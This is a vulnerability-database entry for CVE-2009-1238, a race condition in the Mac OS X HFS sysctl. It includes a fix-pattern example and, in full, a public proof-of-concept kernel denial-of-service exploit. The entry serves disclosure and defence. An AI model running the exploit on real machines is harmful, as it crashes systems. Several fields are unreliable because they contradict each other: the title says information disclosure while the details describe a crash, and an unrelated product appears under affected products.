Apple Mac OS X 'HFS_SET_PKG_EXTENSIONS' Multiple Local Information Disclosure Vulnerabilities

Vulnerability ID: 1117500    Vulnerability type: Race condition
Published: 2009-03-23    Updated: 2009-04-02
CVE ID: CVE-2009-1238    CNNVD-ID: CNNVD-200904-050
Platform: OSX    CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/8265
https://www.securityfocus.com/bid/80605
https://cxsecurity.com/issue/WLB-2009040110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-050
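|Vulnerability details
Multiple local information disclosure vulnerabilities exist in the HFS sysctl interface in XNU 1228.8.20 and earlier on Apple Mac OS X 10.5.6 and earlier. A local user can cause a denial of service (memory corruption) by executing the same HFS_SET_PKG_EXTENSIONS code path simultaneously in multiple threads. The issue arises because access to a global variable is not protected by a mutual-exclusion lock.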
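The fix pattern for the root cause described above, as an added example that is not part of the original entry and is not XNU code: a user-space model in which a setter replaces a global table, and the pointer and its sizes are published together under one mutex. All names (ext_table, set_ext_table, and so on) and the writer inputs are hypothetical and constructed for illustration.

```c
#include <pthread.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical user-space model (not XNU code): a global table and its sizes. */
static char *ext_table;
static int ext_nentries, ext_maxwidth;
static pthread_mutex_t ext_lock = PTHREAD_MUTEX_INITIALIZER;

/* Replace the table: build the copy unlocked, publish it under the lock. */
int set_ext_table(const char *data, int nentries, int maxwidth) {
    if (data == NULL || nentries <= 0 || maxwidth <= 0 || maxwidth > 255)
        return -1;
    size_t len = (size_t)nentries * (size_t)maxwidth;
    char *fresh = malloc(len);
    if (fresh == NULL) return -1;
    memcpy(fresh, data, len);
    pthread_mutex_lock(&ext_lock);
    char *old = ext_table;      /* pointer and both sizes change as one unit */
    ext_table = fresh;
    ext_nentries = nentries; ext_maxwidth = maxwidth;
    pthread_mutex_unlock(&ext_lock);
    free(old);                  /* exactly one caller ever holds this pointer */
    return 0;
}

/* Invariant check: the constructed writers fill each table with its width. */
int ext_table_consistent(void) {
    int ok = 1;
    pthread_mutex_lock(&ext_lock);
    size_t len = (size_t)ext_nentries * (size_t)ext_maxwidth;
    for (size_t i = 0; ext_table != NULL && i < len; i++)
        ok &= ((unsigned char)ext_table[i] == (unsigned char)ext_maxwidth);
    pthread_mutex_unlock(&ext_lock);
    return ok;
}

static void *writer(void *arg) {
    int width = (int)(long)arg; /* constructed input: 50, 100, 150 or 200 */
    char buf[16 * 255];
    memset(buf, width, sizeof buf);
    for (int i = 0; i < 2000; i++) set_ext_table(buf, 16, width);
    return NULL;
}

int run_concurrent_writers(void) { /* returns 1 when final state is coherent */
    pthread_t t[4];
    for (long i = 0; i < 4; i++)
        if (pthread_create(&t[i], NULL, writer, (void *)((i + 1) * 50)) != 0)
            return -1;
    for (int i = 0; i < 4; i++) pthread_join(t[i], NULL);
    return ext_table_consistent();
}
```

Without the lock, two callers could both read the same old pointer and free it twice, or leave the pointer and the sizes describing different tables.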
|Exploit (EXP)
/* xnu-vfssysctl-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.x local kernel DoS POC
 * by mu-b - Wed 19 Nov 2008
 *
 * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>

void
hammer (void *arg)
{
  char buf[1024 * (255 + 1)];
  int n, name[6];

  memset (buf, 0, sizeof buf);

  while (1)
    {
      name[0] = CTL_VFS;
      name[1] = 17;
      name[2] = HFS_SET_PKG_EXTENSIONS;
      name[3] = (int) buf;
      name[4] = 1024;
      name[5] = (rand () % 254) + 1;
      n = sysctl (name, 6, NULL, NULL, NULL, 0);

      usleep(10);
    }
}

int
main (int argc, char **argv)
{
  int i, n, tid;

  printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  for (i = 0; i < 4; i++)
    {
      n = pthread_create (&tid, NULL, hammer, NULL);
      if (n < 0)
        {
          fprintf (stderr, "failed creating hammer thread\n");
          return (EXIT_FAILURE);
        }
    }

  while (1)
    sleep (1);

  /* not reached! */
  return (EXIT_SUCCESS);
}

// milw0rm.com [2009-03-23]
|Affected products
Cosmicperl Directory Pro 10.0.3 Apple Mac OS X Server 10.5.6 Apple Mac OS X Server 10.5.5 Apple Mac OS X Server 10.5.4 Apple Mac OS X Server 10.5.3 Apple Mac OS X Server
|References

Source: BID
Name: 34202
Link: http://www.securityfocus.com/bid/34202
Source: MILW0RM
Name: 8265
Link: http://www.milw0rm.com/exploits/8265
Source: MISC
Link: http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
Source: MISC
Link: http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c
Source: SECUNIA
Name: 34424
Link: http://secunia.com/advisories/34424